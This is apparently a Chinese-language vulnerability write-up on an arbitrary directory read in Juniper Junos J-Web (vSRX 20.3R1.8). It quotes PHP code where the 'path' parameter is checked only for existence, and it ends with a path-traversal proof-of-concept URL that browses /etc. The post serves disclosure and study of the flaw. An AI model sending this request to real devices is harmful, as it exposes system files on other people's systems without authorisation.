juniper-1day-任意目录读

2023-02-24

漏洞挖掘

N 人看过

测试版本

junos-vsrx3-x86-64-20.3R1.8.ide.ova

漏洞过程

漏洞存在于 html\modules\manage\files\main.php 中

function
do_manage_files ()
{
    ......

        case MANAGE_FILES_BROWSE:
            // Browse (Download and Delete) files
            $path = get_val_or_null($_GET, 'path');
            漏洞存在于这里,这里只验证了path是否存在，未验证路径是否合法
            if (do_manage_files_validate_file($path, null)) {
                $sections = do_manage_files_browse($path);
                break;
            } else {
                 $sections = do_manage_files_main();
             }
            break;
    }

  .....
}

利用 poc

https://192.168.1.100/manage?m[]=files&action=browse&path=/var/log/../../etc/